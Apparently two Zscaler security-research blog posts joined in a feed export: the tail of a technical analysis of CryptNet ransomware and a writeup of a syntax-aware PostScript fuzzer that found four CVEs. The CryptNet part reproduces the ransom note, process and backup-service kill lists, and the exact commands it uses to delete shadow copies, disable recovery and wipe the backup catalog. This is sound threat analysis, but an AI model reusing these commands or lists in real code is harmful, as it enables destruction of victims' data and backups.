.lnk
.dib
.dic
.dif
.mdb
.php
.asp
.aspx
.html
.htm
.xml
.psd
.pdf
.xla
.cub
.dae
.divx
.iso
.7zip
.pdb
.ico
.pas
.db
.wmv
.swf
.cer
.bak
.backup
.accdb
.bay
.p7c
.exif
.vss
.raw
.m4a
.wma
.ace
.arj
.bz2
.cab
.gzip
.lzh
.tar
.jpeg
.xz
.mpeg
.torrent
.mpg
.core
.flv
.sie
.sum
.ibank
.wallet
.css
.js
.rb
.crt
.xlsm
.xlsb
.7z
.cpp
.java
.jpe
.ini
.blob
.wps
.docm
.wav
.3gp
.gif
.log
.gz
.config
.vb
.m1v
.sln
.pst
.obj
.xlam
.djvu
.inc
.cvs
.dbf
.tbi
.wpd
.dot
.dotx
.webm
.m4v
.amv
.m4p
.svg
.ods
.bk
.vdi
.vmdk
.onepkg
.accde
.jsp
.json
.xltx
.vsdx
.uxdc
.udl
.3ds
.3fr
.3g2
.accda
.accdc
.accdw
.adp
.ai
.ai3
.ai4
.ai5
.ai6
.ai7
.ai8
.arw
.ascx
.asm
.asmx
.avs
.bin
.cfm
.dbx
.dcm
.dcr
.pict
.rgbe
.dwt
.f4v
.exr
.kwm
.max
.mda
.mde
.mdf
.mdw
.mht
.mpv
.msg
.myi
.nef
.odc
.geo
.swift
.odm
.odp
.oft
.orf
.pfx
.p12
.pl
.pls
.safe
.tab
.vbs
.xlk
.xlm
.xlt
.xltm
.svgz
.slk
.tar.gz
.dmg
.ps
.psb
.tif
.rss
.key
.vob
.epsp
.dc3
.iff
.opt
.onetoc2
.nrw
.pptm
.potx
.potm
.pot
.xlw
.xps
.xsd
.xsf
.xsl
.kmz
.accdr
.stm
.accdt
.ppam
.pps
.ppsm
.1cd
.p7b
.wdb
.sqlite
.sqlite3
.db-shm
.db-wal
.dacpac
.zipx
.lzma
.z
.tar.xz
.pam
.r3d
.ova
.1c
.dt
.c
.vmx
.xhtml
.ckp
.db3
.dbc
.dbs
.dbt
.dbv
.frm
.mwb
.mrg
.txz
.mrg
.vbox
.wmf
.wim
.xtp2
.xsn
.xslt
Table 3. File extensions encrypted by CryptNet
Depending on the file size, the ransomware will encrypt parts of the file or the full file content. If the file is less than 512KB in size, CryptNet will encrypt the full file. Otherwise, the code will encrypt just the first 128KB of data from the beginning, middle and end of the file as shown in Figure 5.
Figure 5. CryptNet encryption algorithm for large files
The symmetric encryption algorithm used in both cases is AES in CBC mode with a pseudo randomly generated 32-byte key and 16-byte initialization vector (IV) per file. Each file’s AES key will be encrypted with a hardcoded 2,048-bit RSA key. The ransomware stores the RSA key as an encrypted string in XML format with the RSA modulus and exponent base64 encoded as shown below:
<RSAKeyValue><Modulus>8TO8tQQRyFqQ0VShtSpLkDqtDVsrxS8SfdOsqRAj8mWF7sVoGzyZMcv501DF6iZUdKYsFDlaSMnuckG9+MJmD2ldZwU/0H6Xztkta1BkJWSO2qHg2JAGDp9ZsFGP1wDR9oRb1w7wtBe7Db3wf7q848+qKPWiTP/2R/jlR4evW73M65Jdo9uOzQnbmvw+blsloXeszuYlW2nCcwQ7WarzAK29UmM9ZHS0/lqzU0KHNU+DvyfGwmMJgtb2HN6GFGXq9Z0n3dNBCQVzdUl2G/7fLAMoFbJeExn5USZdFHr2ygheTilo/shmfq7tcPCZM8C4zqBtb0Nbct0f/M48+H920Q==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
The RSA encrypted AES key is then prepended to the encrypted file content.
Ransom note and finishing actions
During the encryption process, CryptNet will drop a ransom note with the name RESTORE-FILES-[9 random chars].txt containing the following text:
*** CRYPTNET RANSOMWARE ***
--- What happened? ---
All of your files are encrypted and stolen. Stolen data will be published soon
on our tor website. There is no way to recover your data and prevent data leakage without us
Decryption is not possible without private key. Don't waste your and our time to recover your files.
It is impossible without our help
--- How to recover files & prevent leakage? ---
To make sure that we REALLY CAN recover your data - we offer FREE DECRYPTION for warranty.
We promise that you can recover all your files safely and prevent data leakage. We can do it!
--- Contact Us---
Download Tor Browser - https://www.torproject.org/download/ and install it
Open website: http://cryptr3fmuv4di5uiczofjuypopr63x2gltlsvhur2ump4ebru2xd3yd.onion
Enter DECRYPTION ID: [DECRYPTION ID]
CryptNet will then proceed to change the wallpaper and kill the following processes in Table 4.
sqlwriter
sqbcoreservice
VirtualBoxVM
sqlagent
sqlbrowser
sqlservr
code
steam
zoolz
agntsvc
firefoxconfig
infopath
synctime
VBoxSVC
tbirdconfig
thebat
thebat64
isqlplussvc
mydesktopservice
mysqld
ocssd
onenote
mspub
mydesktopqos
CNTAoSMgr
Ntrtscan
vmplayer
oracle
outlook
powerpnt
wps
xfssvccon
ProcessHacker
dbeng50
dbsnmp
encsvc
excel
tmlisten
PccNTMon
mysqld-nt
mysqld-opt
ocautoupds
ocomm
msaccess
msftesql
thunderbird
visio
winword
wordpad
mbamtray
Table 4. Processes terminated by CryptNet
Additionally, if the ransomware is run with administrator privileges, CryptNet will stop the list of services shown in Table 5.
BackupExecAgentBrowser
veeam
VeeamDeploymentSvc
PDVFSService
BackupExecVSSProvider4
BackupExecAgentAccelerator
svc
AcrSch2Svc
AcronisAgent
Veeam.EndPoint.Service
CASAD2DWebSvc
CAARCUpdateSvc
YooIT
memtas
sophos
DefWatch
ccEvtMgr
SavRoam
RTVscan
QBFCService
Intuit.QuickBooks.FCS
YooBackup
BackupExecRPCService
MSSQLSERVER
backup
GxVss
GxBlr
GxFWD
GxCVD
GxCIMgr
VeeamNFSSvc8
BackupExecDiveciMediaService
SQLBrowser
SQLAgent$VEEAMSQL2008R2
SQLAgent$VEEAMSQL2012
VeeamDeploymentService
BackupExecJobEngine
Veeam.EndPoint.Tray6
BackupExecManagementService
SQLAgent$SQL_2008
zhudongfangyu
stc_raw_agent
QBCFMonitorService
VeeamTransportSvc
VSNAPVSS$
Table 5. Services stopped by CryptNet
CryptNet will also remove Windows shadow copies and then delete the backup catalog if the ransomware has administrator privileges. To perform those actions, the following commands are executed:
vssadmin delete shadows /all /quiet & wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
Victim Portal and Data Leak Site
When a victim accesses the Tor hidden service in the ransom note, a login screen prompts the user to enter a decryption ID and solve a captcha as shown in Figure 6.
Figure 6. CryptNet victim ransom portal
After the decryption ID is entered, the victim is presented with a timer and an option to test file decryption as shown in Figure 7.
Figure 7. CryptNet ransom portal with test decryption
The portal also provides a chat feature to interact with the threat group and negotiate a ransom payment as shown in Figure 8.
Figure 8. CryptNet live chat support
There is an automated message in the chat that provides a link to a “blog” site, where the CryptNet threat group publishes stolen data belonging to companies that have been breached as shown in Figure 9.
Figure 9. CryptNet data leak site
The Chaos/Yashma link
Similarities
CryptNet is clearly using the same codebase as the Chaos and Yashma ransomware families with numerous similarities in the code. For example, Figure 10 shows a comparison between the main encryption routines of CryptNet and Yashma with the same structure, checks and control flow.
Figure 10. Comparison of the Yashma (left) and CryptNet (right) main encryption routines
The excluded folders and files are also very similar along with the file extensions that are targeted for encryption (provided in the Appendix).
Both ransomware families also stop an extensive list of backup services and execute identical commands to delete shadow copies, disable recovery mode and delete the backup catalog as shown in Figure 11.
Figure 11. Yashma (left) vs CryptNet (right) commands to disable backups
Differences
When compared with Yashma, CryptNet lacks some features including a lack of persistence and language/country restrictions. In addition, CryptNet uses different techniques to encrypt files (based on size) and a different method for concurrency. These differences are likely performance-oriented to speed up the amount of time required to encrypt files. Yashma encrypts the full content of all files (which can take significant time for larger files), while CryptNet will only fully encrypt small files (< 512KB) and small parts of larger files.
The concurrency implementation also differs between CryptNet and Yashma. The former uses a Parallel.For loop to iterate through each file, while CryptNet uses Tasks to process each directory as shown in Figure 12.
Figure 12. Yashma (left) vs CryptNet (right) concurrency implementations
The Tasks concurrency implementation is likely more suitable for file encryption operations.
Conclusion
CryptNet is a simple but effective ransomware that has taken the popular Chaos and Yashma codebase and increased the file encryption efficiency. The code is not particularly advanced, but the algorithms and implementation are cryptographically secure. They also claim to perform double extortion attacks, following an increasing trend that has been set by more advanced threat groups.
Zscaler ThreatLabz continues to track this threat group and add detections to protect our customers.
Cloud Sandbox
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to CryptNet at various levels with the following threat names:
Win32.Ransom.CryptNet
Indicators Of Compromise (IOCs)
SHA256
Description
2e37320ed43e99835caa1b851e963ebbf153f16cbe395f259bd2200d14c7b775
CryptNet ransomware
Appendix
Yashma excluded folders
Program Files
Program Files (x86)
Windows
$Recycle.Bin
MSOCache
Documents and Settings
Intel
PerfLogs
Windows.old
AMD
NVIDIA
ProgramData
Yashma excluded files
appdata\\local
appdata\\locallow
users\\all users
\\ProgramData
boot.ini
bootfont.bin
boot.ini
iconcache.db
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
autorun.inf
bootsect.bak
bootmgfw.efi
desktop.ini
Yashma extensions to encrypt
.txt
.jar
.dat
.contact
.settings
.doc
.docx
.xls
.xlsx
.ppt
.pptx
.odt
.jpg
.mka
.mhtml
.oqy
.png
.csv
.py
.sql
.mdb
.php
.asp
.aspx
.html
.htm
.xml
.psd
.pdf
.xla
.cub
.dae
.indd
.cs
.mp3
.mp4
.dwg
.zip
.rar
.mov
.rtf
.bmp
.mkv
.avi
.apk
.lnk
.dib
.dic
.dif
.divx
.iso
.7zip
.ace
.arj
.bz2
.cab
.gzip
.lzh
.tar
.jpeg
.xz
.mpeg
.torrent
.mpg
.core
.pdb
.ico
.pas
.db
.wmv
.swf
.cer
.bak
.backup
.accdb
.bay
.p7c
.exif
.vss
.raw
.m4a
.wma
.flv
.sie
.sum
.ibank
.wallet
.css
.js
.rb
.crt
.xlsm
.xlsb
.7z
.cpp
.java
.jpe
.ini
.blob
.wps
.docm
.wav
.3gp
.webm
.m4v
.amv
.m4p
.svg
.ods
.bk
.vdi
.vmdk
.onepkg
.accde
.jsp
.json
.gif
.log
.gz
.config
.vb
.m1v
.sln
.pst
.obj
.xlam
.djvu
.inc
.cvs
.dbf
.tbi
.wpd
.dot
.dotx
.xltx
.pptm
.potx
.potm
.pot
.xlw
.xps
.xsd
.xsf
.xsl
.kmz
.accdr
.stm
.accdt
.ppam
.pps
.ppsm
.1cd
.3ds
.3fr
.3g2
.accda
.accdc
.accdw
.adp
.ai
.ai3
.ai4
.ai5
.ai6
.ai7
.ai8
.arw
.ascx
.asm
.asmx
.avs
.bin
.cfm
.dbx
.dcm
.dcr
.pict
.rgbe
.dwt
.f4v
.exr
.kwm
.max
.mda
.mde
.mdf
.mdw
.mht
.mpv
.msg
.myi
.nef
.odc
.geo
.swift
.odm
.odp
.oft
.orf
.pfx
.p12
.pl
.pls
.safe
.tab
.vbs
.xlk
.xlm
.xlt
.xltm
.svgz
.slk
.tar.gz
.dmg
.ps
.psb
.tif
.rss
.key
.vob
.epsp
.dc3
.iff
.onepkg
.onetoc2
.opt
.p7b
.pam
.r3d
.anom
.exe
Tue, 16 May 2023 01:10:03 -0700Santiago Vicentehttps://www.zscaler.com/blogs/security-research/technical-analysis-cryptnet-ransomwareSmash PostScript Interpreters Using A Syntax-Aware Fuzzer
https://www.zscaler.com/blogs/security-research/smash-postscript-interpreters-using-syntax-aware-fuzzer
Introduction
In 2022, Zscaler’s ThreatLabz performed vulnerability hunting for some of the most popular PostScript interpreters using a custom-built syntax-aware fuzzer. The PostScript interpreters that were evaluated include Adobe Acrobat Distiller and Apple’s PSNormalizer. At the time of publication, ThreatLabz has discovered three vulnerabilities (CVE-2022-35665, CVE-2022-35666, CVE-2022-35668) in Adobe Acrobat Distiller and one vulnerability (CVE-2022-32843) in Apple’s PSNormalizer. This blog presents how the syntax-aware fuzzer was developed and analyzes the results.
PostScript Language
PostScript is a stack-based programming language, where values are pushed onto a stack and popped off by subsequent operations. It is a high-level language with a rich set of built-in operators for executing a wide range of tasks, including manipulating text, drawing shapes, and transforming graphics.
A PostScript interpreter executes a PostScript language according to the rules that determine the order in which operations are carried out and how the pieces of a PostScript program fit together to produce results. The interpreter manipulates entities that are called PostScript objects. Some objects are data, such as numbers, boolean values, strings, and arrays. Other objects are elements of programs to be executed, such as names, operators, and procedures. However, there is no distinction between data and programs. Any PostScript object can be treated as data or executed as part of a program. A character stream can be scanned according to the syntax rules of the PostScript language, producing a sequence of new objects. The interpreter operates by executing a sequence of objects. The PostScript interpreter can manage five stacks representing the execution state of a PostScript program: the operand stack, dictionary stack, execution stack, graphics state stack, and clipping path stack. The former three stacks are relevant for this blog and described below:
The operand stack is used to hold arbitrary PostScript objects that are the operands and results of PostScript operators being executed. The interpreter pushes objects on the operand stack when it encounters them as literal data in a program being executed.
The dictionary stack is used to hold the dictionary objects that define the current context for PostScript operations.
The execution stack is used to hold the executable objects which are mainly procedures and files. At any point in the execution of a PostScript program, this stack represents the program’s call stack.
There are more than 300 operators supported in the PostScript language. Each operator description is presented in the following format illustrated in Figure 1.
Figure 1. A detailed description of the operator in the PostScript program
Syntax-Aware Fuzzer
We developed a syntax-aware fuzzer to find vulnerabilities in two popular PostScript interpreters: Acrobat Distiller and PSNormalizer. In order to implement a syntax-aware fuzzer, we first needed to write well-functioning grammar rules to parse all kinds of character streams for the PostScript language. We wrote a grammar file for the PostScript language in ANTLR (ANother Tool for Language Recognition). Second, we needed to implement a PostScript generator based on the grammar rules. We constructed the parse tree by walking through parser rules in the grammar file randomly, using the Python treelib package. After completing the construction of the parse tree, we traversed all terminal nodes in the parse tree and generated a new PostScript character stream to derive a new test case.
Grammar Development With ANTLR
A grammar file in ANTLR is made up of the parser rules and the lexer rules. The lexers are also known as tokenizers, which are the first step in creating a parser. A lexer takes the individual characters and transforms them into tokens. The parser then uses the tokens to create a logical structure and generate a parse tree. Figure 2 shows a code snippet of the grammar file for the PostScript language in ANTLRv4.
Figure 2. Code snippet of the grammar file for PostScript language in ANTLR
Let’s take a look at an example in Figure 3 and imagine that we are trying to parse a mathematical operation.
Figure 3. The workflow of constructing the parse tree in ANTLR
In this blog, we won’t go into the internals of ANTLR or how to write a grammar rule in ANTLR. An excellent ANTLR tutorial can be found here. As shown in Figure 2, the starting rule of the PostScript parser rules is ps. We can test the following PostScript program with the grammar file in ANTLR.
{ [1 2 1 3] << /r 1 /s 2>> 4 256 {-32 -250 1048 750} [0.001 0 0 0.001 0 0] << 0 << /PageSize [612 1008] >> 1 << /PageSize [612 792] >> >> (aaaa) setcolorspace } stopped pop
The following GUI demonstrates that ANTLR can parse the code snippet of a PostScript program into a parse tree based on the defined grammar file. We can get the sequence of the tokens (the input PostScript program) via a depth-first search algorithm as shown in Figure 4.
Figure 4. The sequence of the tokens (the input PostScript program) via a depth-first search algorithm
The ANTLR parser recognizes the elements presented in the source code and builds a parse tree. We generated a large number of test cases with the grammar rule for the Postscript language in ANTLR, which was able to parse almost all of the Postscript programs. ANTLR is capable of recognizing the characters present in the source code and constructing it as a parse tree. However, it is not able to generate the PostScript code randomly based on the grammar. In order to develop a syntax-aware fuzzer, the first step is to write a well-functioning grammar file for the PostScript program, the second step is to construct the parse tree by walking through the parser rules in the grammar file randomly and finally generate the PostScript code by traversing all terminal nodes in the parse tree. The grammar file for the PostScript program in ANTLR enabled us to complete the first step. Therefore, we had to implement a PostScript generator based on the grammar rules.
Parse Tree Construction
In order to construct the parse tree by walking through the different parser rules randomly in the grammar file, we leveraged the Python treelib package, which provides an efficient implementation of a tree data structure. The main features of treelib include:
support for common tree operations like traversing, insertion, deletion, node moving, shallow/deep copying, subtree cutting, etc.
support for a user-defined data payload to accelerate model construction.
efficient operation for searching nodes.
We considered the following pattern to start the construction of the parse tree.
{ <fuzz> } stopped pop
Similar to a programming language like Javascript, it is possible to implement a try/catch block in Postscript. The operator stopped in PostScript provides an effective way for a PostScript program to “catch” errors or other premature terminations, and potentially perform its own error recovery.
In PostScript, curly braces { and } enclose a procedure (an executable array or executable packed array object). The interpreter does not execute a procedure immediately, but treats it as data; it pushes the procedure on the operand stack. Only when the procedure is explicitly invoked will it be executed. A PostScript program may terminate prematurely by executing the stop operator. The stopped operator establishes an execution environment that encapsulates the effect of a stop. That is, stopped executes a procedure given as an operand and places a boolean value on the stack. This value can be popped in order to preserve the operand stack before and after the handling procedure. If the interpreter executes stop during that procedure, it terminates the procedure and resumes execution at the object immediately after the stopped operator.
Figure 5 shows the parser rule for a procedure in ANTLR.
Figure 5. The parser rule for procedure in ANTLR
We start constructing the parse tree from the procedure parser rule. Figure 6 shows the code snippet to construct the parse tree randomly starting from the procedure parser rule.
Figure 6. Code snippet of constructing the parse tree randomly
Once we finish the construction of the parse tree, we can traverse the parse tree to obtain the character stream of all terminal nodes and then generate a new test case as shown in Figure 7.
Figure 7. Code to traverse the parse tree and obtain the character stream of all terminal nodes
Figure 8 shows a newly generated PostScript test case from our syntax-aware fuzzer.
Figure 8. A newly generated PostScript test case
Fuzzing Results
We discovered three vulnerabilities that are identified as CVE-2022-35665, CVE-2022-35666, and CVE-2022-35668 in Adobe Acrobat Distiller and one vulnerability that is identified as CVE-2022-32843 in Apple’s PSNormalizer via our syntax-aware PostScript fuzzer. Respectively, these vulnerabilities were addressed in https://helpx.adobe.com/security/products/acrobat/apsb22-39.html and https://support.apple.com/en-us/HT213345.
The affected software applications for CVE-2022-35665, CVE-2022-35666, CVE-2022-35668 are the following:
Acrobat DC Continuous 22.001.20169 and earlier versions in Windows & macOS
Acrobat 2020 Classic 2020 20.005.30362 and earlier versions in Windows & macOS
Acrobat 2017 Classic 2017 17.012.30249 and earlier versions in Windows & macOS
The affected software applications for CVE-2022-32843 are the following:
macOS Monterey 12.4 and earlier versions
macOS Big Sur 11.6.7 and earlier versions
Security Update 2022-004 Catalina and earlier versions
CVE-2022-35665: Adobe Acrobat Distiller PostScript File Use-After-Free Vulnerability
A specially crafted PostScript file can trigger a Use-After-Free vulnerability that could result in arbitrary code execution in the context of the current user. Figure 9 shows the PoC for CVE-2022-35665.
Figure 8. The PoC for CVE-2022-35665
Figure 9 shows the crash information in WinDBG.
Figure 9. The crash information in WinDBG for CVE-2022-35665
CVE-2022-35666: Adobe Acrobat Distiller PostScript File Arbitrary Code Execution Vulnerability
A specially crafted PostScript file can trigger an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Figure 10 shows the PoC for CVE-2022-35666.
Figure 10. The PoC for CVE-2022-35666
This vulnerability can be reproduced reliably in Adobe Acrobat Pro DC on macOS. This should work on the "standard" conversion in the Acrobat Distiller. Figure 11 shows the Console app with the full crash report for CVE-2022-35666.
Figure 11. The full crash report for CVE-2022-35666 in the Adobe Acrobat Distiller
Next, let’s take a closer look at where the crash occurs in the debugger LLDB as shown in Figure 12.
Figure 12. The location where the crash for CVE-2022-35666 occurs in the debugger LLDB
CVE-2022-35668: Adobe Acrobat Distiller PostScript File Improper Input Validation Information Disclosure Vulnerability
A specially crafted PostScript file can trigger an Improper Input Validation vulnerability that could lead to the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Figure 13 shows the PoC for CVE-2022-35668.
Figure 13. The PoC for CVE-2022-35668
Figure 14 shows the crash information in WinDBG.
Figure 14. The crash information in Windbg for CVE-2022-35668
CVE-2022-32843: Apple PSNormalizer PostScript File Memory Out-of-Bounds Write Vulnerability
CVE-2022-32843 is an out-of-bounds write vulnerability in Apple’s PSNormalizer Framework due to the lack of proper bounds checking. Processing a maliciously crafted PostScript file may result in unexpected app termination or disclosure of process memory. This vulnerability was addressed in https://support.apple.com/en-us/HT213345 by Apple. Figure 15 shows the PoC for CVE-2022-32843.
Figure 15. The PoC for CVE-2022-32843
Figure 16 shows LLDB attached to the normalizerd process when the crash occurs.
Figure 16. Debugging CVE-2022-32843 in LLDB
Summary
Developing a syntax-aware fuzzer for PostScript interpreters is challenging and fun. In this blog, we discussed how to implement a syntax-aware fuzzer using ANTLRv4 and the Python treelib package for the PostScript language. Using these techniques, we discovered three vulnerabilities (CVE-2022-35665, CVE-2022-35666, and CVE-2022-35668) in Adobe Acrobat Distiller and one vulnerability (CVE-2022-32843) in Apple’s PSNormalizer. Lastly, we walked through PoCs for each of these four vulnerabilities.
Mitigation
All users of Adobe Acrobat are encouraged to upgrade to the latest version of this software. All users of macOS are encouraged to upgrade to the latest version. Zscaler’s Advanced Threat Protection and Advanced Cloud Sandbox can protect customers against these four vulnerabilities.
PDF.Exploit.CVE-2022-35668
PDF.Exploit.CVE-2022-35665
PDF.Exploit.CVE-2022-35666
OSX.Exploit.CVE-2022-32843
References
https://helpx.adobe.com/security/products/acrobat/apsb22-39.html
https://support.apple.com/en-us/HT213345
https://support.apple.com/en-us/HT213343
https://support.apple.com/en-us/HT213344
https://www.adobe.com/jp/print/postscript/pdfs/PLRM.pdf
https://srcincite.io/assets/postscript-pat-and-his-black-and-white-hat.pdf
https://www.antlr.org/
https://treelib.readthedocs.io/en/latest/
https://tomassetti.me/antlr-mega-tutorial/#chapter28
https://github.com/syuanivy/PostScript-Interpreter
Wed, 26 Apr 2023 08:40:43 -0700Kai Luhttps://www.zscaler.com/blogs/security-research/smash-postscript-interpreters-using-syntax-aware-fuzzer